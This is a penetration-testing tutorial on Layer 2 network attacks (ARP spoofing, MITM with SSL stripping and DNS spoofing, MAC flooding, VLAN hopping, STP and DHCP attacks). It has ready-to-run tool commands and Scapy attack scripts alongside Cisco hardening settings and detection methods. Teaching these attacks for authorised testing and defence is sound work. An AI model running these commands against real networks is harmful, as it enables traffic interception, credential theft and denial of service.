ARP & Layer 2 Attacks for Pentesters
TL;DR: Layer 2 attacks exploit the trust-based nature of local networks. ARP spoofing enables MITM, MAC flooding can force switches into hub mode, and VLAN hopping can breach network segmentation.
Table of Contents
Open Table of Contents
Quick Reference
Essential Commands
| Command | Purpose | Example |
|---|
arp -a | View ARP cache | arp -a |
ip neigh | Linux ARP cache | ip neigh show |
arpspoof | ARP spoofing | arpspoof -i eth0 -t victim gateway |
ettercap | MITM framework | ettercap -T -M arp /victim// /gateway// |
bettercap | Modern MITM | bettercap -iface eth0 |
macchanger | Change MAC | macchanger -r eth0 |
macof | MAC flooding | macof -i eth0 |
Layer 2 Protocols
| Protocol | Purpose | Port/Type |
|---|
| ARP | IP to MAC resolution | EtherType 0x0806 |
| RARP | MAC to IP (legacy) | EtherType 0x8035 |
| STP | Loop prevention | BPDU |
| CDP/LLDP | Device discovery | Multicast |
| 802.1Q | VLAN tagging | EtherType 0x8100 |
| DHCP | IP assignment | UDP 67/68 |
| Tool | Primary Use | Type |
|---|
| arpspoof | ARP spoofing | CLI |
| ettercap | MITM suite | CLI/GUI |
| bettercap | Modern MITM | CLI |
| Cain & Abel | Windows MITM | GUI |
| macof | MAC flooding | CLI |
| yersinia | Layer 2 attacks | CLI/GUI |
Why Layer 2 Matters
The Trust Problem
Layer 2 protocols were designed for convenience, not security:
| Protocol | Trust Issue | Exploitation |
|---|
| ARP | No authentication | Spoofing attacks |
| DHCP | First responder wins | Rogue DHCP |
| STP | Trust BPDU sources | Root bridge takeover |
| CDP/LLDP | Broadcast sensitive info | Information gathering |
Attack Impact
| Attack | Result | Impact |
|---|
| ARP spoofing | Traffic interception | Credential theft, session hijacking |
| MAC flooding | Switch becomes hub | Passive sniffing |
| VLAN hopping | Cross VLAN access | Network segmentation bypass |
| DHCP spoofing | Traffic redirect | MITM, DNS poisoning |
Real-World Scenarios
Internal Pentest Scenario:
1. Attacker gains network access (physical or WiFi)
2. ARP spoof to intercept traffic between users and gateway
3. Capture credentials, session tokens
4. Pivot to internal systems
Red Team Scenario:
1. Drop device in target network
2. Passively gather traffic via MAC flooding
3. Active MITM when ready to attack
4. Maintain persistence
Understanding ARP
TL;DR: ARP (Address Resolution Protocol) maps IP addresses to MAC addresses. It has no authentication, making it trivially spoofable.
Why ARP Exists
Problem:
IP knows: "Send to 192.168.1.10"
Ethernet needs: "Send to AA:BB:CC:DD:EE:FF"
Solution: ARP resolves IP → MAC
┌────────────────┐ ┌────────────────┐
│ Host A │ │ Host B │
│ IP: 192.168.1.5│ │ IP: 192.168.1.10│
│ MAC: AA:AA:... │ │ MAC: BB:BB:... │
└───────┬────────┘ └───────┬────────┘
│ │
│ ARP Request (broadcast): │
│ "Who has 192.168.1.10? │
│ Tell 192.168.1.5" │
│──────────────────────────────►│
│ │
│ ARP Reply (unicast): │
│ "192.168.1.10 is at │
│ BB:BB:CC:DD:EE:FF" │
│◄──────────────────────────────│
│ │
│ (A caches: 192.168.1.10 = │
│ BB:BB:CC:DD:EE:FF) │
ARP Packet Structure
┌─────────────────────────────────────────────────────────────────┐
│ ARP Packet │
├─────────────────────────────────────────────────────────────────┤
│ Hardware Type (2 bytes): 0x0001 (Ethernet) │
│ Protocol Type (2 bytes): 0x0800 (IPv4) │
│ Hardware Size (1 byte): 6 (MAC length) │
│ Protocol Size (1 byte): 4 (IPv4 length) │
│ Opcode (2 bytes): 1=Request, 2=Reply │
│ Sender MAC (6 bytes): AA:AA:AA:AA:AA:AA │
│ Sender IP (4 bytes): 192.168.1.5 │
│ Target MAC (6 bytes): 00:00:00:00:00:00 (unknown in request) │
│ Target IP (4 bytes): 192.168.1.10 │
└─────────────────────────────────────────────────────────────────┘
ARP Cache
Systems cache ARP entries to avoid constant broadcasts:
# View ARP cache (Linux)
arp -a
ip neigh show
# View ARP cache (Windows)
arp -a
# View ARP cache (macOS)
arp -a
# Sample output:
# 192.168.1.1 at 00:11:22:33:44:55 [ether] on eth0
# 192.168.1.10 at aa:bb:cc:dd:ee:ff [ether] on eth0
ARP Security Problems
| Issue | Description |
|---|
| No authentication | Anyone can send ARP replies |
| Stateless | Replies accepted without requests |
| Broadcast | Everyone sees ARP requests |
| Trust-based | Systems believe all ARP responses |
| Caching | Poisoned entries persist |
ARP Spoofing/Poisoning
TL;DR: Send fake ARP replies to associate your MAC with another IP (usually the gateway), redirecting traffic through your machine.
How ARP Spoofing Works
Normal Network:
┌────────────┐ ┌────────────┐
│ Victim │ ────── Traffic ─────────────►│ Gateway │
│192.168.1.10│ │192.168.1.1 │
│ MAC: VICTIM│ │ MAC: ROUTER│
└────────────┘ └────────────┘
After ARP Spoofing:
┌────────────┐ ┌────────────┐
│ Victim │ │ Gateway │
│192.168.1.10│ │192.168.1.1 │
└──────┬─────┘ └──────┬─────┘
│ │
│ "Gateway is at │ "Victim is at
│ ATTACKER MAC" │ ATTACKER MAC"
│ │
│ ┌────────────┐ │
└───────────►│ Attacker │◄───────────────┘
│192.168.1.50│
│ MAC:ATTACK │
│ (MITM) │
└────────────┘
Attack Steps
1. Enable IP forwarding (so traffic flows through)
2. Send spoofed ARP to victim: "Gateway IP is at MY MAC"
3. Send spoofed ARP to gateway: "Victim IP is at MY MAC"
4. Traffic flows: Victim → Attacker → Gateway → Attacker → Victim
5. Intercept, modify, or simply sniff traffic
| Attack | Detect | Defend |
|---|
| ARP spoofing | Duplicate MAC detection | Static ARP entries |
| Gratuitous ARP flood | ARP rate monitoring | Dynamic ARP Inspection (DAI) |
| MITM via ARP | IDS signatures | Port security |
Testing Checklist
ARP Spoofing Commands
# === Preparation ===
# Enable IP forwarding (Linux)
echo 1 > /proc/sys/net/ipv4/ip_forward
# Or permanently:
sysctl -w net.ipv4.ip_forward=1
# Identify targets
arp -a
nmap -sn 192.168.1.0/24
# === Using arpspoof ===
# Spoof victim (tell victim you're the gateway)
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
# Spoof gateway (tell gateway you're the victim)
# Run in another terminal:
arpspoof -i eth0 -t 192.168.1.1 192.168.1.10
# === Using ettercap ===
# Text mode ARP MITM
ettercap -T -M arp /192.168.1.10// /192.168.1.1//
# GUI mode
ettercap -G
# === Using bettercap ===
# Interactive mode
bettercap -iface eth0
# Then in bettercap:
> set arp.spoof.targets 192.168.1.10
> arp.spoof on
# One-liner
bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.10; arp.spoof on"
# === Using Scapy ===
python3 << 'EOF'
from scapy.all import *
import time
target_ip = "192.168.1.10"
gateway_ip = "192.168.1.1"
attacker_mac = get_if_hwaddr("eth0")
# Get target MAC
target_mac = getmacbyip(target_ip)
gateway_mac = getmacbyip(gateway_ip)
# Spoof packets
def spoof():
# Tell target: gateway is at attacker MAC
pkt1 = ARP(op=2, pdst=target_ip, hwdst=target_mac,
psrc=gateway_ip, hwsrc=attacker_mac)
# Tell gateway: target is at attacker MAC
pkt2 = ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac,
psrc=target_ip, hwsrc=attacker_mac)
send(pkt1, verbose=0)
send(pkt2, verbose=0)
while True:
spoof()
time.sleep(2)
EOF
# === Cleanup ===
# Restore original ARP
# Send correct ARP to both parties
python3 -c "
from scapy.all import *
send(ARP(op=2, pdst='192.168.1.10', hwdst='ff:ff:ff:ff:ff:ff',
psrc='192.168.1.1', hwsrc='GATEWAY_MAC'), count=5)
send(ARP(op=2, pdst='192.168.1.1', hwdst='ff:ff:ff:ff:ff:ff',
psrc='192.168.1.10', hwsrc='TARGET_MAC'), count=5)
"
Man-in-the-Middle Attacks
TL;DR: Once positioned via ARP spoofing, intercept and potentially modify traffic passing through.
MITM Capabilities
| Capability | Description | Tool |
|---|
| Sniffing | Capture cleartext credentials | Wireshark, tcpdump |
| SSL Strip | Downgrade HTTPS to HTTP | sslstrip, bettercap |
| DNS Spoofing | Redirect domains | dnsspoof, ettercap |
| Session Hijacking | Steal cookies | Ferret, Hamster |
| Injection | Modify traffic | mitmproxy, ettercap |
| Credential Capture | Grab passwords | Responder |
MITM Attack Flow
┌────────────────────────────────────────────────────────────────────┐
│ MITM Attack Lifecycle │
├────────────────────────────────────────────────────────────────────┤
│ │
│ 1. Position 2. Intercept 3. Attack │
│ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ ARP Spoof │────►│ Route Traffic│────►│ Sniff/Modify│ │
│ │ DHCP Spoof │ │ Through Self │ │ Credentials │ │
│ │ Evil Twin │ │ │ │ SSL Strip │ │
│ └─────────────┘ └─────────────┘ │ DNS Spoof │ │
│ └─────────────┘ │
│ │
└────────────────────────────────────────────────────────────────────┘
Practical MITM Scenarios
Credential Sniffing
# 1. Position with ARP spoofing
bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.10; arp.spoof on"
# 2. Sniff credentials
# Using tcpdump for HTTP
tcpdump -i eth0 -A 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
# Using ettercap
ettercap -T -M arp -i eth0 /192.168.1.10// /192.168.1.1//
# Using bettercap's sniffer
bettercap -iface eth0
> set arp.spoof.targets 192.168.1.10
> arp.spoof on
> set net.sniff.local true
> net.sniff on
SSL Stripping
# SSL Strip downgrades HTTPS to HTTP
# Works when victim clicks HTTP link or no HSTS
# Using bettercap
bettercap -iface eth0
> set arp.spoof.targets 192.168.1.10
> arp.spoof on
> set http.proxy.sslstrip true
> http.proxy on
# Using sslstrip (legacy)
# 1. Set up iptables redirect
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
# 2. Run sslstrip
sslstrip -l 8080
# 3. Monitor sslstrip.log for credentials
DNS Spoofing
# Redirect victim's DNS queries to attacker-controlled IPs
# Using bettercap
bettercap -iface eth0
> set arp.spoof.targets 192.168.1.10
> arp.spoof on
> set dns.spoof.domains target.com,*.target.com
> set dns.spoof.address 192.168.1.50
> dns.spoof on
# Using ettercap
# Create etter.dns file:
echo "*.target.com A 192.168.1.50" >> /etc/ettercap/etter.dns
ettercap -T -M arp -i eth0 /192.168.1.10// /192.168.1.1// -P dns_spoof
# Using dnsspoof (dsniff suite)
echo "192.168.1.50 *.target.com" > hosts.txt
dnsspoof -i eth0 -f hosts.txt
MAC Flooding
TL;DR: Overwhelm switch’s MAC address table, causing it to broadcast all traffic (like a hub), enabling passive sniffing.
How MAC Flooding Works
Normal Switch Operation:
┌─────────────────────────────────────────────────────────────────┐
│ Switch MAC Table │
├─────────────────────────────────────────────────────────────────┤
│ Port 1: AA:AA:AA:AA:AA:AA │
│ Port 2: BB:BB:BB:BB:BB:BB │
│ Port 3: CC:CC:CC:CC:CC:CC │
│ ... room for more entries ... │
└─────────────────────────────────────────────────────────────────┘
Traffic from A to B: Switch knows B is on Port 2, sends only there.
After MAC Flooding:
┌─────────────────────────────────────────────────────────────────┐
│ Switch MAC Table (FULL!) │
├─────────────────────────────────────────────────────────────────┤
│ Random MAC 1, Random MAC 2, Random MAC 3, Random MAC 4... │
│ FULL - No room for legitimate entries! │
└─────────────────────────────────────────────────────────────────┘
Switch doesn't know where B is → Broadcasts to ALL ports
Attacker on any port can now see traffic!
Switch Behavior When Table Full
| Behavior | Result | Attacker Benefit |
|---|
| Fail-open | Broadcast all | Passive sniffing |
| Fail-close | Drop unknown | DoS (rare) |
| Evict oldest | Normal operation | Attack fails |
| Attack | Detect | Defend |
|---|
| MAC flooding | Monitor MAC table | Port security |
| CAM overflow | Alert on table full | Limit MACs per port |
| Traffic interception | Detect broadcast spikes | 802.1X authentication |
MAC Flooding Commands
# Using macof (dsniff suite)
macof -i eth0
# Targeted flooding
macof -i eth0 -d 192.168.1.1
# Using yersinia
yersinia -G # GUI mode
# Select "802.1Q" → "flooding"
# Using Scapy
python3 << 'EOF'
from scapy.all import *
import random
def random_mac():
return ':'.join(['{:02x}'.format(random.randint(0, 255)) for _ in range(6)])
while True:
pkt = Ether(src=random_mac(), dst=random_mac()) / \
IP(src=".".join(str(random.randint(1,254)) for _ in range(4)),
dst=".".join(str(random.randint(1,254)) for _ in range(4))) / \
ICMP()
sendp(pkt, iface="eth0", verbose=0)
EOF
# Verify switch is flooding (run on another host)
tcpdump -i eth0 -e # Should see traffic not destined for you
VLAN Attacks
TL;DR: VLANs segment networks at Layer 2. Attacks can hop between VLANs, bypassing this segmentation.
VLAN Basics
VLAN Segmentation:
┌─────────────────────────────────────────────────────────────────┐
│ Switch │
├─────────────────┬─────────────────┬─────────────────────────────┤
│ VLAN 10 │ VLAN 20 │ VLAN 30 │
│ (Users) │ (Servers) │ (Management) │
├─────────────────┼─────────────────┼─────────────────────────────┤
│ 192.168.10.x │ 192.168.20.x │ 192.168.30.x │
│ Port 1-10 │ Port 11-20 │ Port 21-24 │
└─────────────────┴─────────────────┴─────────────────────────────┘
Normal: VLAN 10 cannot reach VLAN 20 without router
Attack Goal: Jump from VLAN 10 to VLAN 20
Switch Spoofing (DTP Attack)
Negotiate trunk link with switch to access all VLANs.
Attack: Pretend to be a switch using DTP (Dynamic Trunking Protocol)
┌─────────────┐ ┌─────────────┐
│ Attacker │ ──── DTP Negotiate ─────► │ Switch │
│ │ │ │
│ "I'm a │ ◄── Trunk Established ── │ "OK, trunk │
│ switch" │ │ mode" │
└─────────────┘ └─────────────┘
│
│ Now attacker sees ALL VLAN traffic!
│ Can access any VLAN
Switch Spoofing Commands
# Using yersinia
yersinia -G # GUI mode
# Select DTP → Launch attack
# Or command line:
yersinia dtp -attack 1 -interface eth0
# Using Scapy to craft DTP
python3 << 'EOF'
from scapy.all import *
# DTP packet to negotiate trunk
dtp = Dot3(dst="01:00:0c:cc:cc:cc") / \
LLC() / \
SNAP() / \
Raw(load=b"\x01") # Simplified
sendp(dtp, iface="eth0")
EOF
Double Tagging (VLAN Hopping)
Exploit native VLAN handling to reach other VLANs.
Double Tagging Attack:
┌────────────────────────────────────────────────────────────────────┐
│ │
│ Attacker crafts packet: │
│ ┌─────────┬─────────┬─────────┬─────────┐ │
│ │ Ether │ 802.1Q │ 802.1Q │ Payload │ │
│ │ │ Tag:10 │ Tag:20 │ │ │
│ │ │(native) │(target) │ │ │
│ └─────────┴─────────┴─────────┴─────────┘ │
│ │
│ 1. Attacker sends double-tagged frame │
│ 2. First switch strips outer tag (VLAN 10 = native) │
│ 3. Inner tag (VLAN 20) remains │
│ 4. Second switch forwards to VLAN 20 │
│ 5. Packet reaches target VLAN! │
│ │
└────────────────────────────────────────────────────────────────────┘
Requirements:
- Attacker on native VLAN
- Target VLAN trunked between switches
- Switch doesn’t strip both tags
| Attack | Detect | Defend |
|---|
| Switch spoofing | Monitor DTP | Disable DTP, manual trunks |
| Double tagging | Detect double-tagged frames | Change native VLAN |
| VLAN hopping | IDS signatures | Private VLANs |
Double Tagging Commands
# Using Scapy for double tagging
python3 << 'EOF'
from scapy.all import *
# Create double-tagged frame
# Outer tag: Native VLAN (10)
# Inner tag: Target VLAN (20)
target_mac = "aa:bb:cc:dd:ee:ff"
target_ip = "192.168.20.10"
pkt = Ether(dst=target_mac) / \
Dot1Q(vlan=10) / \
Dot1Q(vlan=20) / \
IP(dst=target_ip) / \
ICMP()
sendp(pkt, iface="eth0")
EOF
# Using yersinia
yersinia 802.1q -attack 1 -interface eth0
STP Attacks
TL;DR: Spanning Tree Protocol prevents loops. Attackers can become root bridge to intercept traffic or cause DoS.
STP Basics
STP Root Bridge Election:
- All switches exchange BPDUs
- Lowest Bridge ID becomes root
- All traffic flows through root
Normal:
┌─────────────┐
│ Root Bridge │
│ Priority: │
│ 32768 │
└──────┬──────┘
│
┌──────────────┴──────────────┐
│ │
┌──────▼──────┐ ┌───────▼─────┐
│ Switch A │ │ Switch B │
│ Priority: │ │ Priority: │
│ 32768 │ │ 32768 │
└─────────────┘ └─────────────┘
Attack: Send BPDUs with lower priority → Become root → All traffic through attacker
Root Bridge Takeover
STP Attack Commands
# Using yersinia (most comprehensive)
yersinia -G # GUI mode
# Select STP → Claiming Root Role
# Command line:
yersinia stp -attack 4 -interface eth0 # Root role
# Other STP attacks:
yersinia stp -attack 1 -interface eth0 # Send conf BPDU
yersinia stp -attack 2 -interface eth0 # Send TCN BPDU
yersinia stp -attack 3 -interface eth0 # DoS
# Using Scapy
python3 << 'EOF'
from scapy.all import *
# Craft BPDU with low priority to become root
bpdu = Ether(dst="01:80:c2:00:00:00") / \
LLC() / \
Raw(load=bytes([0x00, 0x00, # Protocol
0x00, # Version
0x00, # Type (config)
0x00, # Flags
0x00, 0x01] + [0x00]*8 + # Root ID (low priority)
[0x00]*8 + # Bridge ID
[0x00]*2 + # Port ID
[0x00]*2 + # Message Age
[0x14, 0x00] + # Max Age
[0x02, 0x00] + # Hello Time
[0x0f, 0x00])) # Forward Delay
sendp(bpdu, iface="eth0", loop=1, inter=2)
EOF
| Attack | Detect | Defend |
|---|
| Root bridge takeover | Monitor topology changes | BPDU Guard |
| Topology change flood | Alert on TCN rate | Root Guard |
| DoS via STP | Detect BPDU anomalies | BPDU Filter |
DHCP Attacks
TL;DR: DHCP provides IP configuration. Rogue DHCP servers can provide malicious settings (gateway, DNS).
DHCP Starvation
Exhaust DHCP pool so legitimate clients can’t get addresses.
Attack:
1. Send DHCP Discover with random MACs
2. Server allocates IPs for each request
3. Pool exhausted
4. Legitimate clients denied
Rogue DHCP Server
Respond to DHCP requests faster than legitimate server.
┌─────────────┐ DHCP Discover ┌─────────────┐
│ Victim │──────────────────────────────────────────────►│
└─────────────┘ │
▲ ▼
│ ┌─────────────┐ ┌─────────────┐
│ │ Rogue │ │ Legit │
│ DHCP Offer │ DHCP │ │ DHCP │
│ (faster!) │ Server │ │ Server │
└───────────────────────────────│ (Attacker) │ │ │
└─────────────┘ └─────────────┘
Rogue server offers:
- Gateway: Attacker IP (MITM)
- DNS: Attacker IP (DNS poisoning)
| Attack | Detect | Defend |
|---|
| DHCP starvation | Monitor lease rate | DHCP snooping |
| Rogue DHCP | Detect multiple servers | Trusted DHCP ports |
| Malicious DHCP options | Validate DHCP responses | 802.1X |
DHCP Attack Commands
# === DHCP Starvation ===
# Using yersinia
yersinia dhcp -attack 1 -interface eth0
# Using DHCPig
pig.py eth0
# === Rogue DHCP Server ===
# Using metasploit
msfconsole
use auxiliary/server/dhcp
set SRVHOST 192.168.1.50
set NETMASK 255.255.255.0
set ROUTER 192.168.1.50 # Attacker as gateway
set DNSSERVER 192.168.1.50 # Attacker as DNS
run
# Using dnsmasq (lightweight)
# /etc/dnsmasq.conf:
# interface=eth0
# dhcp-range=192.168.1.100,192.168.1.200,12h
# dhcp-option=3,192.168.1.50 # Gateway = attacker
# dhcp-option=6,192.168.1.50 # DNS = attacker
dnsmasq -d # Debug mode
# Using bettercap
bettercap -iface eth0
> set dhcp6.spoof.domains *
> dhcp6.spoof on
Layer 2 Defense Mechanisms
Switch Security Features
| Feature | Protection Against | Configuration |
|---|
| Port Security | MAC flooding, spoofing | Limit MACs per port |
| DHCP Snooping | Rogue DHCP | Trust only specific ports |
| DAI | ARP spoofing | Validate ARP against DHCP |
| 802.1X | Unauthorized access | Authenticate before access |
| BPDU Guard | STP attacks | Disable port on BPDU |
| Private VLANs | Inter-host attacks | Isolate hosts |
Configuration Examples (Cisco)
Security Configurations
# === Port Security ===
interface GigabitEthernet0/1
switchport mode access
switchport port-security
switchport port-security maximum 2
switchport port-security violation shutdown
switchport port-security mac-address sticky
# === DHCP Snooping ===
ip dhcp snooping
ip dhcp snooping vlan 10,20
interface GigabitEthernet0/24
ip dhcp snooping trust # Uplink to real DHCP
# === Dynamic ARP Inspection ===
ip arp inspection vlan 10,20
interface GigabitEthernet0/24
ip arp inspection trust # Uplink
# === BPDU Guard ===
interface GigabitEthernet0/1
spanning-tree bpduguard enable
# Or globally:
spanning-tree portfast bpduguard default
# === Root Guard ===
interface GigabitEthernet0/24
spanning-tree guard root
# === DTP Disable ===
interface GigabitEthernet0/1
switchport mode access
switchport nonegotiate
# === 802.1X ===
aaa new-model
aaa authentication dot1x default group radius
dot1x system-auth-control
interface GigabitEthernet0/1
authentication port-control auto
dot1x pae authenticator
Detection Techniques
Detecting ARP Spoofing
# Monitor for duplicate IPs with different MACs
arp -a | sort | uniq -D
# Using arpwatch
arpwatch -i eth0
# Using XArp (GUI)
# Shows ARP changes in real-time
# Wireshark filter
arp.duplicate-address-detected
Detecting MAC Flooding
# Monitor switch CAM table
# Cisco:
show mac address-table count
# Monitor for unusual MAC counts
# Alert if approaching table limit
IDS/IPS Signatures
| Attack | Snort/Suricata Signature |
|---|
| ARP Spoofing | alert arp any any -> any any (msg:"ARP Spoofing"; sid:1000001;) |
| DHCP Starvation | High DHCP Discover rate |
| STP Attack | BPDU from non-infrastructure port |
| Tool | Purpose | Platform |
|---|
| arpspoof | ARP spoofing | Linux |
| ettercap | MITM suite | Linux/Windows |
| bettercap | Modern MITM | Linux/macOS |
| yersinia | Layer 2 attacks | Linux |
| macof | MAC flooding | Linux |
| Cain & Abel | Windows MITM | Windows |
| Tool | Purpose | Platform |
|---|
| arpwatch | ARP monitoring | Linux |
| XArp | ARP detection | Windows |
| Snort | IDS | Linux |
| Wireshark | Packet analysis | All |
Practice Labs
Beginner
| Resource | Focus |
|---|
| TryHackMe - ARP | ARP fundamentals |
| HackTheBox Academy | Layer 2 basics |
| GNS3 labs | Virtual switch practice |
Build Your Own Lab
# Minimum setup:
# - 2 VMs (attacker, victim)
# - Bridged networking
# - Same network segment
# VM1 (Attacker - Kali):
apt install dsniff ettercap-graphical bettercap yersinia
# VM2 (Victim - any OS):
# Just regular traffic to test
# Practice exercises:
1. ARP spoof and capture HTTP traffic
2. DNS spoof to redirect traffic
3. Attempt VLAN hopping (need managed switch)
Glossary
| Term | Definition |
|---|
| ARP | Address Resolution Protocol |
| BPDU | Bridge Protocol Data Unit (STP) |
| CAM Table | Content Addressable Memory (MAC table) |
| DAI | Dynamic ARP Inspection |
| DHCP Snooping | DHCP security feature |
| DTP | Dynamic Trunking Protocol |
| MAC Address | Media Access Control address |
| MITM | Man-in-the-Middle |
| Native VLAN | Untagged VLAN on trunk |
| Port Security | Limit MACs per port |
| STP | Spanning Tree Protocol |
| Trunk | Port carrying multiple VLANs |
| VLAN | Virtual Local Area Network |
What’s Next?
Now that you understand Layer 2 attacks:
| Topic | Description | Link |
|---|
| TCP/IP Deep Dive | Layer 3-4 attacks | TCP/IP Guide |
| Network Fundamentals | Broader networking | Network Fundamentals |
| Wireless Attacks | WiFi security | Coming Soon |
| Internal Pentesting | Full methodology | Practice Labs |
Summary
Layer 2 attacks are powerful for internal network testing:
- ARP Spoofing - Become MITM by poisoning ARP caches
- MAC Flooding - Overflow CAM table for passive sniffing
- VLAN Hopping - Bypass network segmentation
- STP Attacks - Become root bridge for traffic interception
- DHCP Attacks - Rogue server for MITM and DNS poisoning
Key Points:
- Require local network access
- Often first step in internal pentest
- Modern switches have defenses (enable them!)
- Always clean up ARP tables after testing
Found this guide helpful? Check out the other posts in the SecureKhan penetration testing series.